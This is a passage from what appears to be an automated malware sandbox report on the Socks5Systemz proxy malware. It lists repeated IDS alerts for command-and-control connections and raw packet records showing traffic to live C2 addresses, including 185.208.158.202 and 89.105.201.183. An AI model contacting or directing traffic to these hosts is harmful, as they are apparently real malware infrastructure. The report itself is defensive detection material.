                                                                        advapi32.dllAdjustTokenPrivileges

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        DutchNetherlands
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-30T02:33:53.594534+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:53.594534+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:54.179795+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:54.179795+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:58.262436+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:58.262436+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:58.849545+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:33:58.849545+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449736185.208.158.20280TCP
                                                                        2024-11-30T02:34:00.572922+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449746185.208.158.20280TCP
                                                                        2024-11-30T02:34:00.572922+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449746185.208.158.20280TCP
                                                                        2024-11-30T02:34:02.227166+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449752185.208.158.20280TCP
                                                                        2024-11-30T02:34:02.227166+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449752185.208.158.20280TCP
                                                                        2024-11-30T02:34:03.917609+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:03.917609+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:04.497598+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:04.497598+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:05.066031+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:05.066031+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449758185.208.158.20280TCP
                                                                        2024-11-30T02:34:06.739788+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449764185.208.158.20280TCP
                                                                        2024-11-30T02:34:06.739788+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449764185.208.158.20280TCP
                                                                        2024-11-30T02:34:08.320376+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449770185.208.158.20280TCP
                                                                        2024-11-30T02:34:08.320376+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449770185.208.158.20280TCP
                                                                        2024-11-30T02:34:09.937602+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449771185.208.158.20280TCP
                                                                        2024-11-30T02:34:09.937602+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449771185.208.158.20280TCP
                                                                        2024-11-30T02:34:11.556643+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449777185.208.158.20280TCP
                                                                        2024-11-30T02:34:11.556643+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449777185.208.158.20280TCP
                                                                        2024-11-30T02:34:13.226956+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449783185.208.158.20280TCP
                                                                        2024-11-30T02:34:13.226956+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449783185.208.158.20280TCP
                                                                        2024-11-30T02:34:14.944372+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449788185.208.158.20280TCP
                                                                        2024-11-30T02:34:14.944372+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449788185.208.158.20280TCP
                                                                        2024-11-30T02:34:16.553933+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449790185.208.158.20280TCP
                                                                        2024-11-30T02:34:16.553933+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449790185.208.158.20280TCP
                                                                        2024-11-30T02:34:18.166014+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449795185.208.158.20280TCP
                                                                        2024-11-30T02:34:18.166014+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449795185.208.158.20280TCP
                                                                        2024-11-30T02:34:19.845585+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449800185.208.158.20280TCP
                                                                        2024-11-30T02:34:19.845585+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449800185.208.158.20280TCP
                                                                        2024-11-30T02:34:21.511567+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449803185.208.158.20280TCP
                                                                        2024-11-30T02:34:21.511567+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449803185.208.158.20280TCP
                                                                        2024-11-30T02:34:22.101381+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449803185.208.158.20280TCP
                                                                        2024-11-30T02:34:22.101381+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449803185.208.158.20280TCP
                                                                        2024-11-30T02:34:23.884939+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449809185.208.158.20280TCP
                                                                        2024-11-30T02:34:23.884939+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449809185.208.158.20280TCP
                                                                        2024-11-30T02:34:25.556492+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449814185.208.158.20280TCP
                                                                        2024-11-30T02:34:25.556492+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449814185.208.158.20280TCP
                                                                        2024-11-30T02:34:27.189408+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449820185.208.158.20280TCP
                                                                        2024-11-30T02:34:27.189408+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449820185.208.158.20280TCP
                                                                        2024-11-30T02:34:28.850327+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449825185.208.158.20280TCP
                                                                        2024-11-30T02:34:28.850327+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449825185.208.158.20280TCP
                                                                        2024-11-30T02:34:30.470731+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449828185.208.158.20280TCP
                                                                        2024-11-30T02:34:30.470731+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449828185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.109688+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.109688+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.691157+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.691157+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:34.309929+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449839185.208.158.20280TCP
                                                                        2024-11-30T02:34:34.309929+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449839185.208.158.20280TCP
                                                                        2024-11-30T02:34:35.944753+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449844185.208.158.20280TCP
                                                                        2024-11-30T02:34:35.944753+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449844185.208.158.20280TCP
                                                                        2024-11-30T02:34:37.661938+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449849185.208.158.20280TCP
                                                                        2024-11-30T02:34:37.661938+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449849185.208.158.20280TCP
                                                                        2024-11-30T02:34:39.304888+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449853185.208.158.20280TCP
                                                                        2024-11-30T02:34:39.304888+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449853185.208.158.20280TCP
                                                                        2024-11-30T02:34:40.919549+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:40.919549+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:41.503613+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:41.503613+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:43.116466+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449864185.208.158.20280TCP
                                                                        2024-11-30T02:34:43.116466+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449864185.208.158.20280TCP
                                                                        2024-11-30T02:34:44.735837+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449869185.208.158.20280TCP
                                                                        2024-11-30T02:34:44.735837+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449869185.208.158.20280TCP
                                                                        2024-11-30T02:34:46.404795+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449873185.208.158.20280TCP
                                                                        2024-11-30T02:34:46.404795+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449873185.208.158.20280TCP
                                                                        2024-11-30T02:34:48.037210+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449878185.208.158.20280TCP
                                                                        2024-11-30T02:34:48.037210+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449878185.208.158.20280TCP
                                                                        2024-11-30T02:34:49.693432+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449883185.208.158.20280TCP
                                                                        2024-11-30T02:34:49.693432+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449883185.208.158.20280TCP
                                                                        2024-11-30T02:34:51.306229+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449888185.208.158.20280TCP
                                                                        2024-11-30T02:34:51.306229+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449888185.208.158.20280TCP
                                                                        2024-11-30T02:34:53.021656+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449891185.208.158.20280TCP
                                                                        2024-11-30T02:34:53.021656+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449891185.208.158.20280TCP
                                                                        2024-11-30T02:34:54.635453+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449896185.208.158.20280TCP
                                                                        2024-11-30T02:34:54.635453+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449896185.208.158.20280TCP
                                                                        2024-11-30T02:34:56.331578+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449901185.208.158.20280TCP
                                                                        2024-11-30T02:34:56.331578+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449901185.208.158.20280TCP
                                                                        2024-11-30T02:34:57.905243+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449905185.208.158.20280TCP
                                                                        2024-11-30T02:34:57.905243+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449905185.208.158.20280TCP
                                                                        2024-11-30T02:34:59.511137+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449910185.208.158.20280TCP
                                                                        2024-11-30T02:34:59.511137+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449910185.208.158.20280TCP
                                                                        2024-11-30T02:35:01.180445+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449915185.208.158.20280TCP
                                                                        2024-11-30T02:35:01.180445+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449915185.208.158.20280TCP
                                                                        2024-11-30T02:35:02.800433+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449920185.208.158.20280TCP
                                                                        2024-11-30T02:35:02.800433+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449920185.208.158.20280TCP
                                                                        2024-11-30T02:35:04.465736+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449923185.208.158.20280TCP
                                                                        2024-11-30T02:35:04.465736+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449923185.208.158.20280TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 30, 2024 02:33:52.096848965 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:52.216943026 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:52.217019081 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:52.217340946 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:52.337357044 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:53.594434977 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:53.594533920 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:53.701723099 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:53.821722984 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:54.179733038 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:54.179795027 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:54.180908918 CET497372023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:54.301031113 CET20234973789.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:54.301124096 CET497372023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:54.301193953 CET497372023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:54.421323061 CET20234973789.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:54.421401024 CET497372023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:54.541397095 CET20234973789.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:55.731463909 CET20234973789.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:55.777184963 CET497372023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:57.749596119 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:57.869693041 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:58.262341976 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:58.262435913 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:58.375155926 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:58.495166063 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:58.844825029 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:58.849545002 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:58.851532936 CET497452023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:58.972253084 CET20234974589.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:58.973149061 CET497452023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:58.973283052 CET497452023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:58.973344088 CET497452023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:33:59.077771902 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:59.078171968 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:59.093359947 CET20234974589.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:59.135555983 CET20234974589.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:33:59.198087931 CET8049746185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:59.198156118 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:59.198226929 CET8049736185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:33:59.198266983 CET4973680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:59.198496103 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:33:59.318337917 CET8049746185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:00.015137911 CET20234974589.105.201.183192.168.2.4
                                                                        Nov 30, 2024 02:34:00.016177893 CET497452023192.168.2.489.105.201.183
                                                                        Nov 30, 2024 02:34:00.572812080 CET8049746185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:00.572921991 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.686316967 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.686544895 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.806529045 CET8049752185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:00.806634903 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.806781054 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.806833029 CET8049746185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:00.806890011 CET4974680192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:00.926696062 CET8049752185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:02.227019072 CET8049752185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:02.227165937 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.343282938 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.343614101 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.463560104 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:02.463644981 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.463706017 CET8049752185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:02.463758945 CET4975280192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.467372894 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:02.587374926 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:03.916752100 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:03.917608976 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:04.031367064 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:04.151328087 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:04.493899107 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:04.497597933 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:04.608022928 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:04.727838039 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:05.065917969 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:05.066030979 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.273112059 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.277271986 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.393543005 CET8049758185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:05.393676996 CET4975880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.397216082 CET8049764185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:05.397308111 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.415508986 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:05.535389900 CET8049764185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:06.739707947 CET8049764185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:06.739788055 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:06.858076096 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:06.858366013 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:06.978216887 CET8049770185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:06.978344917 CET8049764185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:06.978482008 CET4976480192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:06.978771925 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:06.978771925 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:07.098635912 CET8049770185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:08.320300102 CET8049770185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:08.320375919 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.436048985 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.436395884 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.556494951 CET8049771185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:08.556513071 CET8049770185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:08.556616068 CET4977080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.556629896 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.556945086 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:08.676769972 CET8049771185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:09.935836077 CET8049771185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:09.937602043 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.061472893 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.062005997 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.181926012 CET8049777185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:10.182003021 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.182109118 CET8049771185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:10.182163954 CET4977180192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.182204008 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:10.302063942 CET8049777185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:11.556437969 CET8049777185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:11.556643009 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.670712948 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.671011925 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.790993929 CET8049783185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:11.791013002 CET8049777185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:11.791148901 CET4977780192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.791178942 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.791414022 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:11.911262035 CET8049783185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:13.226771116 CET8049783185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:13.226955891 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.342508078 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.342849970 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.462625027 CET8049783185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:13.462713003 CET4978380192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.462719917 CET8049788185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:13.462790012 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.462992907 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:13.582854033 CET8049788185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:14.944133997 CET8049788185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:14.944371939 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.061223984 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.061567068 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.181313038 CET8049788185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:15.181411982 CET4978880192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.181451082 CET8049790185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:15.181521893 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.181719065 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:15.301517963 CET8049790185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:16.553778887 CET8049790185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:16.553932905 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.670644045 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.670928955 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.790906906 CET8049795185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:16.790930033 CET8049790185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:16.791151047 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.791153908 CET4979080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.791323900 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:16.911159039 CET8049795185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:18.165915012 CET8049795185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:18.166013956 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.280327082 CET4979580192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.280673027 CET4980080192.168.2.4185.208.158.202
                                                                        Nov 30, 2024 02:34:18.400732040 CET8049800185.208.158.202192.168.2.4
                                                                        Nov 30, 2024 02:34:18.400752068 CET8049795185.208.158.202192.168.2.4
